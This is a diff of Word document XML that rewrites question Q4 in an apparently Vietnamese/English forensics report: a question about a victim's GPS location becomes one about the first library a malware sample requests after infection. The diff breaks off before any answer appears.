-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Bottom of Form</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Q4</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Based</w:t>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Identifying</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>initial</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2753,7 +1887,25 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>on</w:t>
+        <w:t>actions</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>of</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2771,7 +1923,7 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>statement</w:t>
+        <w:t>malware</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2789,7 +1941,151 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>from</w:t>
+        <w:t>post-infection</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> can </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>provide</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>insights</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>into</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>its</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>primary</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>objectives</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>What</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>is</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2807,7 +2103,7 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>victim's</w:t>
+        <w:t>first</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2825,25 +2121,7 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>family</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>they</w:t>
+        <w:t>library</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2861,7 +2139,25 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>said</w:t>
+        <w:t>that</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>malware</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2879,7 +2175,7 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>that</w:t>
+        <w:t>requests</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2897,331 +2193,7 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>on</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>September</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 20, 2023, he </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>departed</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>from</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>his</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>residence</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>without</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>informing</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>anyone</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>of</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>his</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>destination</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Where</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>was</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>victim</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>located</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>at</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>that</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>moment</w:t>
+        <w:t>post-infection</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -3238,7 +2210,7 @@
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="36"/>
+          <w:numId w:val="42"/>
         </w:numPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3252,26 +2224,18 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t xml:space="preserve">Để xác định vị trí của nạn nhân vào ngày 20 tháng 9 năm 2023, chúng tôi đã dựa vào phân tích dữ liệu liên quan đến GPS thu thập từ thiết bị </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Android</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> của nạn nhân. Dữ liệu GPS đóng vai trò quan trọng trong các cuộc điều tra pháp y, vì nó có thể xác định chính xác vị trí vật lý của thiết bị dựa trên tương tác với các ứng dụng bản đồ, dịch vụ định vị hoặc các hoạt động được gắn thẻ địa lý. </w:t>
-      </w:r>
+        <w:t xml:space="preserve">Quay lại với phần </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>details</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3279,6 +2243,64 @@
           <w:szCs w:val="26"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>để kiểm tra t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">hư viện đầu tiên mà phần mềm độc hại yêu cầu sau khi </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>nhiễm</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> cần xem lại </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>scanned</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> đầu tiên và </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">tệp cuối cùng được nhấm đến </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3286,7 +2308,7 @@
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="36"/>
+          <w:numId w:val="42"/>
         </w:numPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3300,57 +2322,71 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t xml:space="preserve">Trong phần </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Recent</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Activity</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  ta có thể kiểm tra được hoạt động được ghi lại trong máy nạn nhân cho thấy anh ta đã có mặt tại khách sạn </w:t>
+        <w:t xml:space="preserve">Kết quả được phân tích ra là </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
